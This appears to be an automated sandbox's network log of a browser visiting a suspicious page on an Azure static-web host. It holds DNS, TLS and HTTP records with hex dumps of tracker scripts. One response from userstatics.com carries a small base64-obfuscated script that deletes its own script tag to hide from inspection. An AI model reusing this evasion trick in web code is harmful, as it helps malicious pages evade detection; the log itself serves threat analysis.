                                                        Nov 28, 2024 13:34:44.009943008 CET1.1.1.1192.168.2.40xf50bNo error (0)d20519brkbo4nz.cloudfront.net108.158.75.103A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:44.009943008 CET1.1.1.1192.168.2.40xf50bNo error (0)d20519brkbo4nz.cloudfront.net108.158.75.30A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:44.010229111 CET1.1.1.1192.168.2.40x68baNo error (0)tools.luckyorange.comd20519brkbo4nz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:46.603713036 CET1.1.1.1192.168.2.40xd3ecNo error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:46.603713036 CET1.1.1.1192.168.2.40xd3ecNo error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:46.603713036 CET1.1.1.1192.168.2.40xd3ecNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:46.603713036 CET1.1.1.1192.168.2.40xd3ecNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:46.608606100 CET1.1.1.1192.168.2.40xd1bcNo error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:46.608606100 CET1.1.1.1192.168.2.40xd1bcNo error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:47.319653034 CET1.1.1.1192.168.2.40x5d25No error (0)userstatics.com65IN (0x0001)false
                                                        Nov 28, 2024 13:34:47.319818974 CET1.1.1.1192.168.2.40x782No error (0)userstatics.com104.21.53.38A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:47.319818974 CET1.1.1.1192.168.2.40x782No error (0)userstatics.com172.67.208.186A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:52.605367899 CET1.1.1.1192.168.2.40x8b67No error (0)settings.luckyorange.com34.107.203.234A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:55.320950985 CET1.1.1.1192.168.2.40xd3b4No error (0)o.clarity.msclarity-ingest-eus-sc.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:55.509517908 CET1.1.1.1192.168.2.40x84dNo error (0)o.clarity.msclarity-ingest-eus-sc.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:55.897006989 CET1.1.1.1192.168.2.40x5ad2No error (0)in.visitors.live35.201.124.9A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:55.907697916 CET1.1.1.1192.168.2.40x524bNo error (0)realtime.luckyorange.com35.244.167.102A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:57.877222061 CET1.1.1.1192.168.2.40x1704No error (0)api-preview.luckyorange.com34.107.203.234A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:35:01.615288019 CET1.1.1.1192.168.2.40x10No error (0)api-preview.luckyorange.com34.107.203.234A (IP address)IN (0x0001)false
                                                        • fs.microsoft.com
                                                        • https:
                                                          • tools.luckyorange.com
                                                          • www.clarity.ms
                                                          • userstatics.com
                                                          • settings.luckyorange.com
                                                        • slscr.update.microsoft.com
                                                        • in.visitors.live
                                                        • realtime.luckyorange.com
                                                        • api-preview.luckyorange.com
                                                        • otelrules.azureedge.net
                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                        Nov 28, 2024 13:35:39.836970091 CET13.107.246.63443192.168.2.449860CN=*.azureedge.net, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 19 17:30:52 CEST 2024 Thu Jun 08 02:00:00 CEST 2023 Thu Aug 01 14:00:00 CEST 2013Sun Sep 14 17:30:52 CEST 2025 Wed Aug 26 01:59:59 CEST 2026 Fri Jan 15 13:00:00 CET 2038771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,028a2c9bd18a11de089ef85a160da29e4
                                                        CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Jun 08 02:00:00 CEST 2023Wed Aug 26 01:59:59 CEST 2026
                                                        CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Aug 01 14:00:00 CEST 2013Fri Jan 15 13:00:00 CET 2038
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.4497392.23.161.164443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:35 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: fs.microsoft.com
                                                        2024-11-28 12:34:35 UTC478INHTTP/1.1 200 OK
                                                        Content-Type: application/octet-stream
                                                        Server: Kestrel
                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                        X-Ms-ApiVersion: Distribute 1.2
                                                        X-Ms-Region: prod-neu-z1
                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                        X-OSID: 2
                                                        X-CID: 2
                                                        X-CCC: GB
                                                        Cache-Control: public, max-age=49592
                                                        Date: Thu, 28 Nov 2024 12:34:35 GMT
                                                        Connection: close
                                                        X-CID: 2


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.4497422.23.161.164443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:36 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                        Range: bytes=0-2147483646
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: fs.microsoft.com
                                                        2024-11-28 12:34:37 UTC514INHTTP/1.1 200 OK
                                                        ApiVersion: Distribute 1.1
                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                        Content-Type: application/octet-stream
                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                        Server: ECAcc (lpl/EF06)
                                                        X-CID: 11
                                                        X-Ms-ApiVersion: Distribute 1.2
                                                        X-Ms-Region: prod-neu-z1
                                                        Cache-Control: public, max-age=49565
                                                        Date: Thu, 28 Nov 2024 12:34:37 GMT
                                                        Content-Length: 55
                                                        Connection: close
                                                        X-CID: 2
                                                        2024-11-28 12:34:37 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449758108.158.75.104435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:42 UTC570OUTGET /core/lo.js?site-id=f6f3e602 HTTP/1.1
                                                        Host: tools.luckyorange.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://ddbsodvnnadewe.z1.web.core.windows.net/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:43 UTC544INHTTP/1.1 200 OK
                                                        Content-Type: text/javascript
                                                        Content-Length: 4678
                                                        Connection: close
                                                        Date: Thu, 28 Nov 2024 12:34:44 GMT
                                                        Last-Modified: Wed, 06 Nov 2024 20:50:22 GMT
                                                        ETag: "2e76f2975071a8eb95d665a06b06cae4"
                                                        x-amz-server-side-encryption: AES256
                                                        Cache-Control: max-age=3600
                                                        Content-Encoding: gzip
                                                        Accept-Ranges: bytes
                                                        Server: AmazonS3
                                                        X-Cache: Miss from cloudfront
                                                        Via: 1.1 3a3261cdebd3450de2b4e3d901a1b028.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: BAH53-P2
                                                        X-Amz-Cf-Id: _C1acIcGIZfvfZP7EWonBOeeDYyqwVbX-DevfPl6IZUWfBHVZI04QQ==
                                                        2024-11-28 12:34:43 UTC4678INData Raw: 1f 8b 08 00 00 00 00 00 02 03 cd 5a fb 73 db 38 92 fe 57 24 dc 9e 86 1c d3 b4 9d 49 a6 66 a8 61 54 de c4 bb 93 5b 27 76 8d 33 7b 57 a5 68 5d 30 09 59 dc 50 80 16 04 ed a8 64 fd ef fb 35 c0 97 5e 49 ee 26 3f 5c 95 cb 92 f0 ec 6e f4 e3 eb 06 bc 69 29 13 93 29 e9 89 c0 f8 ab a9 d2 de 03 d7 3d d9 cb 64 cf f8 62 2c 27 b1 c1 bf b5 ef 99 59 56 04 ed 68 7f 45 e3 4c bc 5a 0f eb c6 9e f4 94 bf ca a6 9e 19 ab 89 af 85 29 35 16 c1 f7 50 7c 5a 28 6d 8a 21 4d d1 31 35 c5 ab 2c 52 41 1e f5 cf 82 aa 33 5a ad d7 c3 6a 92 a0 49 09 cf 73 4f d7 73 03 1d b4 df a5 8f 1f 79 dc 3f 6d db d6 d5 54 19 ce 63 11 c8 30 89 0d fe a7 71 97 bf 00 e4 c9 50 59 56 9f 9e ae ee fe 29 12 13 a6 62 9a 49 71 ad d5 42 68 b3 b4 c3 56 42 96 73 a1 f9 5d 2e 22 ec 71 2f 4c a4 d6 fe 1a eb e9 b8 2b 01 56
                                                        Data Ascii: Zs8W$IfaT['v3{Wh]0YPd5^I&?\ni))=db,'YVhELZ)5P|Z(m!M15,RA3ZjIsOsy?mTc0qPYV)bIqBhVBs]."q/L+V


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.44976120.12.23.50443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:44 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZhsWdDdL2+UeRUR&MD=BZCYPKHf HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                        Host: slscr.update.microsoft.com
                                                        2024-11-28 12:34:45 UTC560INHTTP/1.1 200 OK
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/octet-stream
                                                        Expires: -1
                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                        MS-CorrelationId: e5edf78b-3b26-4a7f-9157-7d5d208d0355
                                                        MS-RequestId: c84b3697-90b1-4705-bca2-9a67360a9306
                                                        MS-CV: PebqE7mXJUyv+vdd.0
                                                        X-Microsoft-SLSClientCache: 2880
                                                        Content-Disposition: attachment; filename=environment.cab
                                                        X-Content-Type-Options: nosniff
                                                        Date: Thu, 28 Nov 2024 12:34:44 GMT
                                                        Connection: close
                                                        Content-Length: 24490
                                                        2024-11-28 12:34:45 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                        2024-11-28 12:34:45 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.44977234.107.203.2344435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:45 UTC578OUTOPTIONS /f6f3e602 HTTP/1.1
                                                        Host: settings.luckyorange.com
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: x-lucky-referrer,x-lucky-uid
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://ddbsodvnnadewe.z1.web.core.windows.net/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:45 UTC551INHTTP/1.1 200 OK
                                                        Access-Control-Allow-Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Access-Control-Allow-Credentials: true
                                                        Access-Control-Allow-Methods: POST,GET,PUT,PATCH,DELETE,OPTIONS
                                                        Access-Control-Allow-Headers: Access-Control-Allow-Origin,Authorization,Content-Type,X-Lucky-Uid,X-Lucky-Site-Id,X-Lucky-Impersonate,X-Lucky-Session-Id,X-Lucky-Referrer
                                                        Access-Control-Max-Age: 86400
                                                        Date: Thu, 28 Nov 2024 12:34:45 GMT
                                                        Via: 1.1 google
                                                        Content-Length: 0
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449774108.158.75.104435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:45 UTC372OUTGET /core/lo.js?site-id=f6f3e602 HTTP/1.1
                                                        Host: tools.luckyorange.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:47 UTC544INHTTP/1.1 200 OK
                                                        Content-Type: text/javascript
                                                        Content-Length: 4678
                                                        Connection: close
                                                        Date: Thu, 28 Nov 2024 12:34:47 GMT
                                                        Last-Modified: Wed, 06 Nov 2024 20:50:22 GMT
                                                        ETag: "2e76f2975071a8eb95d665a06b06cae4"
                                                        x-amz-server-side-encryption: AES256
                                                        Cache-Control: max-age=3600
                                                        Content-Encoding: gzip
                                                        Accept-Ranges: bytes
                                                        Server: AmazonS3
                                                        X-Cache: Miss from cloudfront
                                                        Via: 1.1 7fe845e495399d62eea17599202da57e.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: BAH53-P2
                                                        X-Amz-Cf-Id: xkpr8MlsP-HpmGyX0UO9m85qySasgSTws2PIqlyILf7rNz6powI-7Q==
                                                        2024-11-28 12:34:47 UTC4678INData Raw: 1f 8b 08 00 00 00 00 00 02 03 cd 5a fb 73 db 38 92 fe 57 24 dc 9e 86 1c d3 b4 9d 49 a6 66 a8 61 54 de c4 bb 93 5b 27 76 8d 33 7b 57 a5 68 5d 30 09 59 dc 50 80 16 04 ed a8 64 fd ef fb 35 c0 97 5e 49 ee 26 3f 5c 95 cb 92 f0 ec 6e f4 e3 eb 06 bc 69 29 13 93 29 e9 89 c0 f8 ab a9 d2 de 03 d7 3d d9 cb 64 cf f8 62 2c 27 b1 c1 bf b5 ef 99 59 56 04 ed 68 7f 45 e3 4c bc 5a 0f eb c6 9e f4 94 bf ca a6 9e 19 ab 89 af 85 29 35 16 c1 f7 50 7c 5a 28 6d 8a 21 4d d1 31 35 c5 ab 2c 52 41 1e f5 cf 82 aa 33 5a ad d7 c3 6a 92 a0 49 09 cf 73 4f d7 73 03 1d b4 df a5 8f 1f 79 dc 3f 6d db d6 d5 54 19 ce 63 11 c8 30 89 0d fe a7 71 97 bf 00 e4 c9 50 59 56 9f 9e ae ee fe 29 12 13 a6 62 9a 49 71 ad d5 42 68 b3 b4 c3 56 42 96 73 a1 f9 5d 2e 22 ec 71 2f 4c a4 d6 fe 1a eb e9 b8 2b 01 56
                                                        Data Ascii: Zs8W$IfaT['v3{Wh]0YPd5^I&?\ni))=db,'YVhELZ)5P|Z(m!M15,RA3ZjIsOsy?mTc0qPYV)bIqBhVBs]."q/L+V


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.44977013.107.246.634435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:46 UTC550OUTGET /tag/nb9vpk5smt HTTP/1.1
                                                        Host: www.clarity.ms
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://ddbsodvnnadewe.z1.web.core.windows.net/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:46 UTC528INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:34:46 GMT
                                                        Content-Type: application/x-javascript
                                                        Content-Length: 707
                                                        Connection: close
                                                        Cache-Control: no-cache, no-store
                                                        Expires: -1
                                                        Set-Cookie: CLID=185a6c8731cc4b10811644b6f0bc1620.20241128.20251128; expires=Fri, 28 Nov 2025 12:34:46 GMT; path=/; secure; samesite=none; httponly
                                                        Request-Context: appId=cid-v1:3f60b293-70d6-4805-b0bb-3484f0a73bf0
                                                        x-azure-ref: 20241128T123446Z-174f78459685726chC1EWRsnbg0000000ycg00000000a6tc
                                                        X-Cache: CONFIG_NOCACHE
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:34:46 UTC707INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 61 2c 72 2c 69 2c 74 2c 79 29 7b 66 75 6e 63 74 69 6f 6e 20 73 79 6e 63 28 29 7b 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 63 2e 67 69 66 22 7d 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 73 79 6e 63 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 73 79 6e 63 29 3b 69 66 28 61 5b 63 5d 2e 76 7c 7c 61 5b 63 5d 2e 74 29 72 65 74 75 72 6e 20 61 5b 63 5d 28 22 65 76 65 6e 74 22 2c 63 2c 22 64 75 70 2e 22 2b 69 2e 70 72 6f 6a 65 63 74 49 64 29 3b 61 5b 63 5d 2e 74 3d 21 30 2c 28 74 3d 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 29 29 2e
                                                        Data Ascii: !function(c,l,a,r,i,t,y){function sync(){(new Image).src="https://c.clarity.ms/c.gif"}"complete"==document.readyState?sync():window.addEventListener("load",sync);if(a[c].v||a[c].t)return a[c]("event",c,"dup."+i.projectId);a[c].t=!0,(t=l.createElement(r)).


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449777172.67.208.1864435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:46 UTC682OUTGET /get/script.js?referrer=https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE HTTP/1.1
                                                        Host: userstatics.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://ddbsodvnnadewe.z1.web.core.windows.net/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:47 UTC1035INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:34:47 GMT
                                                        Content-Type: text/javascript; charset=utf-8
                                                        Content-Length: 133
                                                        Connection: close
                                                        X-Powered-By: PHP/8.2.1
                                                        Access-Control-Allow-Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Access-Control-Allow-Methods: GET, POST
                                                        Access-Control-Allow-Headers: X-Requested-With,content-type
                                                        Access-Control-Allow-Credentials: true
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5TK26Q%2BnAaJthz06riOvUAHoU5QKb%2Fdeil1sleAllQpgqgoWW0%2Ftx%2FQxuh9IRulsFpZ7rDXxgLDYkXiHe%2BoQfMjytd2uOIZTnkatExn68rnKQVNwd1hExfewKqYb9jp1MPM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8e9a64e29cd678db-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1828&rtt_var=689&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1260&delivery_rate=1584373&cwnd=235&unsent_bytes=0&cid=b3f0b0cb354e022a&ts=699&x=0"
                                                        2024-11-28 12:34:47 UTC133INData Raw: 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 6e 65 77 20 52 65 67 45 78 70 28 61 74 6f 62 28 22 64 58 4e 6c 63 6e 4e 30 59 58 52 70 59 33 4d 75 59 32 39 74 22 29 29 2e 74 65 73 74 28 65 2e 73 72 63 29 26 26 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 29 3b
                                                        Data Ascii: document.querySelectorAll("script").forEach(e=>{new RegExp(atob("dXNlcnN0YXRpY3MuY29t")).test(e.src)&&document.body.removeChild(e)});


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.44978613.107.246.634435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:48 UTC417OUTGET /tag/nb9vpk5smt HTTP/1.1
                                                        Host: www.clarity.ms
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: CLID=185a6c8731cc4b10811644b6f0bc1620.20241128.20251128
                                                        2024-11-28 12:34:49 UTC379INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:34:48 GMT
                                                        Content-Type: application/x-javascript
                                                        Content-Length: 707
                                                        Connection: close
                                                        Cache-Control: no-cache, no-store
                                                        Expires: -1
                                                        Request-Context: appId=cid-v1:2f7711a9-b21e-4abe-a9d6-5b0ce5d18b64
                                                        x-azure-ref: 20241128T123448Z-174f7845968ljs8phC1EWRe6en0000000ycg000000000g0g
                                                        X-Cache: CONFIG_NOCACHE
                                                        Accept-Ranges: bytes
